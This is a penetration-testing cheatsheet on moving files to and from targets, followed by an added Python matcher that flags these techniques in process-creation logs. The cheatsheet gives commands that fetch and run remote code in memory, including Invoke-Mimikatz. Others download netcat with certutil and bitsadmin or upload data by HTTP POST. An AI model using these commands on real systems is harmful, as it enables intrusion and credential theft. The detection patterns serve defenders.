File Transfers

  • In penetration testing, you will usually need to transfer files to and from your targets. For example, you might exploit a target and need to upload a script to check for vulnerabilities in the system.

  • Since there are usually restrictions in place, you need to know different techniques. If one technique doesn't work, you can try another or even combine or chain different techniques to bypass the controls of the target.

  • There are multiple techniques that work in different situations, some of which utilize Living off the Land binaries. These binaries can be checked here:

    • Windows - https://lolbas-project.github.io/

    • Linux - https://gtfobins.github.io/

  • Below is a cheatsheet with some of the techniques:

Invoke-WebRequest <Target>/<File-to-Download> -OutFile <Output-File-Name> # Download a file using PowerShell. Example: Invoke-WebRequest https://<snip>/PowerView.ps1 -OutFile PowerView.ps1

Invoke-WebRequest <File-to-Download> -UserAgent [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome -OutFile "<Output-File>" # Changing the User-Agent. Example: Invoke-WebRequest http://nc.exe -UserAgent [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome -OutFile "nc.exe"

IEX (New-Object Net.WebClient).DownloadString('<Target>/<File-to-Execute>') # Execute a file in memory using PowerShell. Example: IEX (New-Object Net.WebClient).DownloadString('https://<snip>/Invoke-Mimikatz.ps1')

Invoke-WebRequest -Uri <Target-to-Upload> -Method POST -Body <Data-to-Upload> # Upload a file using PowerShell. Example: Invoke-WebRequest -Uri http://10.10.10.32:443 -Method POST -Body $b64

bitsadmin /transfer n <Source-to-Download-from>/<File-Name> <Output-Path> # Download a file using bitsadmin. Example: bitsadmin /transfer n http://10.10.10.32/nc.exe C:\Temp\nc.exe

certutil.exe -verifyctl -split -f <Source-to-Download-From>/<File-Name> # Download a file using certutil. Example: certutil.exe -verifyctl -split -f http://10.10.10.32/nc.exe

wget <Link-to-Download-From> # Downloading a file using wget.

curl -o <Output-File-Name> <URL-to-Download-From> # Download a file using curl.

php -r '$file = file_get_contents("<Source-to-Download-from>"); file_put_contents("<Output-File>",$file);' # Download a file using PHP

scp <Source-File> <Destination> # Transfer a file using scp; the source comes first, then the destination. Example: scp C:\Temp\bloodhound.zip user@10.10.10.150:/tmp/bloodhound.zip
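
The Windows commands in the cheatsheet leave recognizable process command lines, which is what a defender keys on when reviewing process-creation logs. The following is an added example, not part of the original page: a small Python matcher run over constructed process-creation records. The rule names, host names and 192.0.2.x addresses are assumptions made for the illustration.

```python
import re

# Rule names are hypothetical labels; the patterns cover only the Windows
# commands shown in the cheatsheet above.
RULES = {
    "certutil_download": r"\bcertutil(\.exe)?\s.*-verifyctl\b.*https?://",
    "bitsadmin_download": r"\bbitsadmin(\.exe)?\s.*/transfer\b.*https?://",
    "ps_download_to_disk": r"\bInvoke-WebRequest\b.*-OutFile\b",
    "ps_custom_user_agent": r"\bInvoke-WebRequest\b.*-UserAgent\b",
    "ps_in_memory_exec": r"\b(IEX|Invoke-Expression)\b.*\bDownloadString\b",
    "ps_http_upload": r"\bInvoke-WebRequest\b.*-Method\s+POST\b.*-Body\b",
}
COMPILED = {name: re.compile(rx, re.IGNORECASE) for name, rx in RULES.items()}

def classify(command_line):
    """Return the sorted names of every rule the command line matches."""
    return sorted(n for n, rx in COMPILED.items() if rx.search(command_line))

def scan(events):
    """Return (host, command_line, rules) for each event matching a rule."""
    hits = []
    for host, command_line in events:
        rules = classify(command_line)
        if rules:
            hits.append((host, command_line, rules))
    return hits

# Constructed process-creation records (host, command line); 192.0.2.0/24 is
# a documentation-only address range.
SAMPLE_EVENTS = [
    ("ws01", r"certutil.exe -verifyctl -split -f http://192.0.2.10/tool.exe"),
    ("ws01", r"certutil.exe -hashfile C:\Temp\report.pdf SHA256"),
    ("ws02", r"bitsadmin /transfer n http://192.0.2.10/tool.exe C:\Temp\tool.exe"),
    ("ws03", "powershell.exe -c \"IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a.ps1')\""),
    ("ws03", "powershell.exe Invoke-WebRequest http://192.0.2.10/a.exe -UserAgent [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome -OutFile a.exe"),
    ("ws04", "powershell.exe Invoke-WebRequest -Uri http://192.0.2.10:443 -Method POST -Body $b64"),
    ("ws05", r"powershell.exe Get-ChildItem C:\Temp"),
]

if __name__ == "__main__":
    for host, cmd, rules in scan(SAMPLE_EVENTS):
        print(f"{host}: {', '.join(rules)} <- {cmd}")
```

The benign `certutil -hashfile` and `Get-ChildItem` records produce no hit, which is the distinction to preserve when tuning such rules: match on the transfer-specific arguments, not on the binary name alone.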
